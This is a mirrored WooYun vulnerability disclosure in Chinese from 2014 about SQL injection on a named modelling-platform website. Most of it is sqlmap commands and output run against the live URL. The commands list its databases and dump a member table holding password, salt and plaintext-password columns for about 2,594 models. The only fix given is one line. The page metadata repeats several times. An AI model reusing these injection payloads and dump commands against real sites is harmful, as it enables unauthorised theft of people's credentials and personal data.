某模特网络平台SQL注入漏洞泄露2500多模特资料和多家模特公司团体资料信息

admin

140557
文章

117
评论

2015年7月29日07:51:56评论253 views字数 240阅读0分48秒阅读模式

摘要

2014-11-04：积极联系厂商并且等待厂商认领中，细节不对外公开
2014-12-19：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(2) 关注此漏洞

缺陷编号： WooYun-2014-81888

漏洞标题：某模特网络平台SQL注入漏洞泄露2500多模特资料和多家模特公司团体资料信息

漏洞作者： linadmin

提交时间： 2014-11-04 12:31

公开时间： 2014-12-19 12:32

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： php+数字类型注射

0人收藏

漏洞详情

披露状态：

2014-11-04：积极联系厂商并且等待厂商认领中，细节不对外公开
2014-12-19：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

某模特网络平台SQL注入漏洞泄露2500多模特资料和多家模特公司团体资料信息：）

详细说明：

SQL注入链接：http://www.motexiu.cn/a/2011missworld/picture.php?areaid=7

C:/Users/franklin/Desktop/1>sqlmap.py -u "http://www.motexiu.cn/a/2011missworld/

picture.php?areaid=7"

___ ___| |_____ ___ ___ {1.0-dev-nongit-20141022}

|_ -| . | | | .'| . |

|___|_ |_|_|_|_|__,| _|

|_| |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 20:17:11

[20:17:11] [INFO] resuming back-end DBMS 'mysql'

[20:17:11] [INFO] testing connection to the target URL

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: areaid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: areaid=7 AND 4154=4154

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: areaid=7 AND SLEEP(5)

---

[20:17:12] [INFO] the back-end DBMS is MySQL

web server operating system: Windows 2003 or XP

web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17

back-end DBMS: MySQL 5.0.11

[20:17:12] [INFO] fetched data logged to text files under 'C:/Users/franklin/.sq

lmap/output/www.motexiu.cn'

[*] shutting down at 20:17:12

C:/Users/franklin/Desktop/1>sqlmap.py -u "http://www.motexiu.cn/a/2011missworld/

picture.php?areaid=7" --dbs

___ ___| |_____ ___ ___ {1.0-dev-nongit-20141022}

|_ -| . | | | .'| . |

|___|_ |_|_|_|_|__,| _|

|_| |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 20:17:49

[20:17:49] [INFO] resuming back-end DBMS 'mysql'

[20:17:49] [INFO] testing connection to the target URL

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: areaid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: areaid=7 AND 4154=4154

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: areaid=7 AND SLEEP(5)

---

[20:17:50] [INFO] the back-end DBMS is MySQL

web server operating system: Windows 2003 or XP

web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17

back-end DBMS: MySQL 5.0.11

[20:17:50] [INFO] fetching database names

[20:17:50] [INFO] fetching number of databases

[20:17:50] [INFO] resumed: 10

[20:17:50] [INFO] resumed: information_schema

[20:17:50] [INFO] resumed: hshop

[20:17:50] [INFO] resumed: motexiu_cn

[20:17:50] [INFO] resumed: motexiu_weed

[20:17:50] [INFO] resumed: mtx_cn

[20:17:50] [INFO] resumed: mysql

[20:17:50] [INFO] resumed: test123

[20:17:50] [INFO] resumed: web20130630

[20:17:50] [INFO] resumed: website

[20:17:50] [INFO] resumed: #mysql50#

available databases [10]:

[*] `#mysql50#`

[*] hshop

[*] information_schema

[*] motexiu_cn

[*] motexiu_weed

[*] mtx_cn

[*] mysql

[*] test123

[*] web20130630

[*] website

[20:17:50] [INFO] fetched data logged to text files under 'C:/Users/franklin/.sq

lmap/output/www.motexiu.cn'

[*] shutting down at 20:17:50

C:/Users/franklin/Desktop/1>sqlmap.py -u "http://www.motexiu.cn/a/2011missworld/

picture.php?areaid=7" --dump -T mote_member -D mtx_cn

___ ___| |_____ ___ ___ {1.0-dev-nongit-20141022}

|_ -| . | | | .'| . |

|___|_ |_|_|_|_|__,| _|

|_| |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 20:19:22

[20:19:22] [INFO] resuming back-end DBMS 'mysql'

[20:19:22] [INFO] testing connection to the target URL

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: areaid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: areaid=7 AND 4154=4154

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: areaid=7 AND SLEEP(5)

---

[20:19:23] [INFO] the back-end DBMS is MySQL

web server operating system: Windows 2003 or XP

web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17

back-end DBMS: MySQL 5.0.11

[20:19:23] [INFO] fetching columns for table 'mote_member' in database 'mtx_cn'

[20:19:23] [INFO] resumed: 22

[20:19:23] [INFO] resumed: firmidr

[20:19:23] [INFO] resumed: firmmunber

[20:19:23] [INFO] resumed: password

[20:19:23] [INFO] resumed: salt

[20:19:23] [INFO] resumed: realpwd

[20:19:23] [INFO] resumed: smoney

[20:19:23] [INFO] resumed: group

[20:19:23] [INFO] resumed: views

[20:19:23] [INFO] resumed: flag

[20:19:23] [INFO] resumed: rec

[20:19:23] [INFO] resumed: approve

[20:19:23] [INFO] resumed: regip

[20:19:23] [INFO] resumed: regtime

[20:19:23] [INFO] resumed: formername

[20:19:23] [INFO] resumed: warnflag

[20:19:23] [INFO] resumed: groupid

[20:19:23] [INFO] resumed: formerif

[20:19:23] [INFO] resumed: isnew

[20:19:23] [INFO] resumed: altinfo

[20:19:23] [INFO] resumed: altcert

[20:19:23] [INFO] resumed: tjemail

[20:19:23] [INFO] resumed: isfrozen

[20:19:23] [INFO] fetching entries for table 'mote_member' in database 'mtx_cn'

[20:19:23] [INFO] fetching number of entries for table 'mote_member' in database

'mtx_cn'

[20:19:23] [INFO] resumed: 2594

漏洞证明：

C:/Users/franklin/Desktop/1>sqlmap.py -u "http://www.motexiu.cn/a/2011missworld/

picture.php?areaid=7" --dump -T mote_member -D mtx_cn

___ ___| |_____ ___ ___ {1.0-dev-nongit-20141022}

|_ -| . | | | .'| . |

|___|_ |_|_|_|_|__,| _|

|_| |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 20:19:22

[20:19:22] [INFO] resuming back-end DBMS 'mysql'

[20:19:22] [INFO] testing connection to the target URL

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: areaid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: areaid=7 AND 4154=4154

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: areaid=7 AND SLEEP(5)

---

[20:19:23] [INFO] the back-end DBMS is MySQL

web server operating system: Windows 2003 or XP

web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17

back-end DBMS: MySQL 5.0.11

[20:19:23] [INFO] fetching columns for table 'mote_member' in database 'mtx_cn'

[20:19:23] [INFO] resumed: 22

[20:19:23] [INFO] resumed: firmidr

[20:19:23] [INFO] resumed: firmmunber

[20:19:23] [INFO] resumed: password

[20:19:23] [INFO] resumed: salt

[20:19:23] [INFO] resumed: realpwd

[20:19:23] [INFO] resumed: smoney

[20:19:23] [INFO] resumed: group

[20:19:23] [INFO] resumed: views

[20:19:23] [INFO] resumed: flag

[20:19:23] [INFO] resumed: rec

[20:19:23] [INFO] resumed: approve

[20:19:23] [INFO] resumed: regip

[20:19:23] [INFO] resumed: regtime

[20:19:23] [INFO] resumed: formername

[20:19:23] [INFO] resumed: warnflag

[20:19:23] [INFO] resumed: groupid

[20:19:23] [INFO] resumed: formerif

[20:19:23] [INFO] resumed: isnew

[20:19:23] [INFO] resumed: altinfo

[20:19:23] [INFO] resumed: altcert

[20:19:23] [INFO] resumed: tjemail

[20:19:23] [INFO] resumed: isfrozen

[20:19:23] [INFO] fetching entries for table 'mote_member' in database 'mtx_cn'

[20:19:23] [INFO] fetching number of entries for table 'mote_member' in database

'mtx_cn'

[20:19:23] [INFO] resumed: 2594

修复方案：

过滤参数

版权声明：转载请注明来源 linadmin@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-11-04 15:11 | 机器猫 ( 普通白帽子 | Rank:1358 漏洞数:291 | 爱生活、爱腾讯、爱网络！一个有梦想的16岁...)

0

卧槽！我要美眉的资料 →_→

1# 回复此人

某模特网络平台SQL注入漏洞泄露2500多模特资料和多家模特公司团体资料信息

漏洞概要关注数(2) 关注此漏洞

缺陷编号： WooYun-2014-81888

漏洞标题：某模特网络平台SQL注入漏洞泄露2500多模特资料和多家模特公司团体资料信息

相关厂商：模特秀

漏洞作者： linadmin

提交时间： 2014-11-04 12:31

公开时间： 2014-12-19 12:32

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： php+数字类型注射

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 linadmin@乌云

漏洞回应

厂商回应：

漏洞评价：

漏洞评价(共0人评价):

登陆后才能进行评分

评价

WooYun.org-优酷多个分站存在SSRF漏洞大礼包

WooYun.org-优特捷某内部邮箱账户外泄涉及大量敏感信息(多家合作单位躺枪)

WooYun.org-某网平行权限漏洞（影响所有使用用户）

Bypass分享 | 形而上学，不行退学的一句话

格兰仕千万数据库信息泄露

3399游戏源码下载

WEFANS喂饭后台弱口令

国家电网某充电APP系统Getshell涉及大量用户敏感信息

威锋网游戏站存在SQL注入（含多重绕过+编码）

APP安全之三维度从一个毫无用处的xss到获取大量身份证信息图片(包括李刚身份证)

发表评论

在线咨询

微信

漏洞概要 关注数(2) 关注此漏洞

缺陷编号： WooYun-2014-81888

漏洞标题： 某模特网络平台SQL注入漏洞泄露2500多模特资料和多家模特公司团体资料信息

相关厂商： 模特秀

漏洞作者： linadmin

提交时间： 2014-11-04 12:31

公开时间： 2014-12-19 12:32

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 15

漏洞状态： 未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： php+数字类型注射

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 linadmin@乌云

漏洞回应

厂商回应：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(2) 关注此漏洞

漏洞标题：某模特网络平台SQL注入漏洞泄露2500多模特资料和多家模特公司团体资料信息

相关厂商：模特秀

危害等级：高

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞评价(共0人评价):

登陆后才能进行评分